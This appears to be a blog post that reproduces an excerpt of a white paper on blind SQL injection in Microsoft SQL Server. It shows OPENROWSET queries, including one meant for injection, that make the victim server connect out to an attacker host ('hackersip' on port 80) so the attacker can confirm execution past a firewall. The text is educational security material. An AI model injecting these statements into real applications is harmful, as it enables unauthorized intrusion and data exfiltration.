Many developers and web administrators are complacent about SQL Injection vulnerabilities if the
attacker cannot see the SQL error messages and/or cannot return the queries result directly to
the browser. This topic was first addressed in a white paper written by Chris Ansley of
NGSSoftware (http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf). This paper
will expand on possible ways this threat can be used.
When trying to exploit SQL Injection in an application, an attacker needs a method of determining
if the SQL injected is executed on the server. As well, a method of retrieving the results is
needed. Two built-in functions of SQL Server can be used for this purpose. The OPENROWSET
and OPENDATASOURCE functions allow a user in SQL Server to open remote data sources.
These functions are used to open a connection to an OLEDB provider. The OPENROWSET
function will be use in all the examples but the OPENDATASOURCE function could be used with
the same results.
This statement will return all the rows of table1 on the remote data source:
select * from
OPENROWSET( 'SQLoledb',
'server=servername;uid=sa;pwd=h8ck3r',
'select * from table1' )
Parameters:
(1) OLEDB Provider name
(2) Connection string (could be an OLEDB data source or an ODBC connection string)
(3) SQL statement
The connection string parameter can specify other options such as the network library to use or
the IP address and port to which to connect. Below is an example.
select * from
OPENROWSET('SQLoledb',
'uid=sa;pwd=h8ck3r;Network=DBMSSOCN;Address=10.0.0.10,1433;',
'select * from table' )
In this example, SQL Server will use the OLEDB provider SQLoledb to execute the SQL
statement. The OLEDB provider will use the SQL Server sockets library (DBMSSOCN) to
connect to port 1433 on the IP address 10.0.0.10 and will return the results of the SQL statement
to the local SQL Server. The login sa and the password h8ck3r will be used to authenticate to the
remote data source.
The next example demonstrates how the OPENROWSET function can be used to connect to an
arbitrary IP address/port including the source IP address and port of the attacker. In this case the
hacker’s host name is hackersip and a version of Microsoft SQL Server is running on port 80.
“hackersip” can be replaced with an IP address and the port can be any port the hacker would
like to direct connections to.
select * from
OPENROWSET('SQLoledb',
'uid=sa;pwd=;Network=DBMSSOCN;Address=hackersip,80;',
'select * from table')
By injecting this SQL statement, an attacker can determine if the statement is being executed. If
the SQL is successfully executed, the attacked server will issue an outbound connection attempt
to the attacker’s computer on the port specified. It is also unlikely that the firewall will block this
outbound SQL connection because the connection is occurring over port 80.
This technique allows the attacker to determine if injected SQL statements executed even if error
messages and query results are not returned to the browser.
No comments:
Post a Comment